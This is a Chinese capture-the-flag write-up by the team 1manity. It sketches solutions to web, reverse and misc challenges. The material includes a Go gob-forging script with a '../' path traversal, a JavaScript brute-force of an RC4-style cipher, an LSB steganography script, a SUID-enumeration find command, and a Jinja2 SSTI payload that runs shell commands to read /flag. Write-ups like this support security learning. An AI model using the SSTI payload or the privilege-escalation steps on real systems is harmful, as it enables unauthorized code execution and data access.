1manity’s WriteUp
随便写了点,没写多清楚,(一整个懒住QWQ)
队伍名称
1manity
排名
13名
解题思路
WEB
象棋王子
简单游戏题
找到胜利的逻辑,控制台运行
电子木鱼
rust整数溢出
Cost扣10功德 乘上1073741824就溢出了 -i32变正i32了。就不多说了
BabyGo
gob反序列化+沙箱逃逸
生成gob文件
package main
import (
"encoding/gob"
"fmt"
"os"
)
type User struct {
Name string
Path string
Power string
}
func main() {
fmt.Println("Hello World")
userDir := "/tmp/b1a6761e169cd3774fa99ebfc114aa29/"
info := User{Name: "ctfer", Path: userDir, Power: "admin"}
name := "user.gob"
File, _ := os.OpenFile(name, os.O_RDWR|os.O_CREATE, 0777)
defer File.Close()
enc := gob.NewEncoder(File)
if err := enc.Encode(info); err != nil {
fmt.Println(err)
}
}
压缩包上传后解压时path传参../,把user.gob解压到上级目录覆盖
go沙箱逃逸,找到文章了,一模一样的
https://www.ctfiot.com/55141.html
REVERSE
PZGalaxy
这不也是web嘛。。。
F12打开看到关键代码,然后爆破一下。直接放控制台就跑完了
function Leaf(k, p) {
var s = [], j = 0, x, res = '';
for (var i = 0; i < 256; i++) {
s[i] = i;
}
for (i = 0; i < 256; i++) {
j = (j + s[i] + k.charCodeAt(i % k.length)) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
}
i = 0;
j = 0;
for (var y = 0; y < p.length; y++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
res += String.fromCharCode(p.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
}
return res;
}
function f() {
for(let i=0;i<=114514;i++){
str1="2023";
str2= i.toString();
var date =str1 + str2.padStart(4, '0') ;
var enc = ['¦', 'p', ':', 'Ü', '\x92', 'Ã', '\x97', 'ó', '\x1A', 'ß', '\b', 'Ö', 'A', ' ', '5', '\x90', '{', '\x06', 'Ô', '÷', 's', '_', '\x1D', ':', 'I', 'L', 'C', 'X', 'Ñ', '¹', 'O', '\x99', '\x85', '3', 'à', 'i', '|'];
flag = Leaf(date, enc.join(''));
if ( flag.substring(0, 4) == "flag" && date.length == 8 && date.substring(0, 4) == "2023"){
console.log(flag);
break;
}
}
}
f()
exp 请粘贴代码,不允许截图。
MISC
验证码
根据提示tupper塔珀自指公式
Snake on web
几分钟秒了,没想到是一血。。。
import time
import keyboard
keyboard.press_and_release("alt+tab")
while 1:
keyboard.press_and_release("s")
time.sleep(0.1)
keyboard.press_and_release("a")
time.sleep(1.8)
keyboard.press_and_release("s")
time.sleep(0.1)
keyboard.press_and_release("d")
time.sleep(1.8)
直接遍历地图,玩会手机flag就到手了
LSSTIB
很web的misc,LSB隐写加SSTI加SUID提权,题目本身提示全了
# -*- coding: UTF-8 -*-
from PIL import Image
def getHideString(hide_string):
#获取要隐藏的文件内容
tmp = hide_string
f = file(tmp,"rb")
str_bin = ""
s = f.read()
for i in range(len(s)):
str_bin = str_bin + str(bin(ord(s[i])).replace('b','')).zfill(8)
#print str
f.closed
return str_bin
def mod(x,y):
return x%y;
#original_file为载体图片路径,hide_string为隐写文件,new_file为加密图片保存的路径
def encode(original_file,hide_string,new_file):
im = Image.open(original_file)
#获取图片的宽和高
width = im.size[0]
print "width:"+str(width)+"\n"
height = im.size[1]
print "height:"+str(height)+"\n"
count = 0
#获取需要隐藏的信息
key = getHideString(hide_string)
keylen = len(key)
for h in range(0,height):
for w in range(0,width):
pixel = im.getpixel((w,h))
R = pixel[0]
G = pixel[1]
B = pixel[2]
if count == keylen:
break
#分别将每个像素点的RGB值余2,这样可以获得最低位的值,然后用原来的值减去最低位的值
#再从需要隐藏的信息中取出一位,转换为整型
#两值相加,需要隐藏的信息就将原来的最低位信息替换掉了
R= R-mod(R,2)+int(key[count])
count+=1
if count == keylen:
im.putpixel((w,h),(R,G,B))
break
G =G-mod(G,2)+int(key[count])
count+=1
if count == keylen:
im.putpixel((w,h),(R,G,B))
break
B= B-mod(B,2)+int(key[count])
count+=1
if count == keylen:
im.putpixel((w,h),(R,G,B))
break
if count % 3 == 0:
im.putpixel((w,h),(R,G,B))
im.save(new_file)
#原图
original_file = "Projectile1-export.png"
#处理后输出的图片路径
new_file = "Projectile1-export.png-stego.png"
#需要隐藏的信息
hide_string = "4.txt"
encode(original_file,hide_string,new_file)
网上找的脚本,官方的SSTI payload
suid提权
find / -perm -u=s -type f 2>/dev/null
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('find lsb.py -exec cat /flag \;').read()")}}
{% endif %}
{% endfor %}
🐮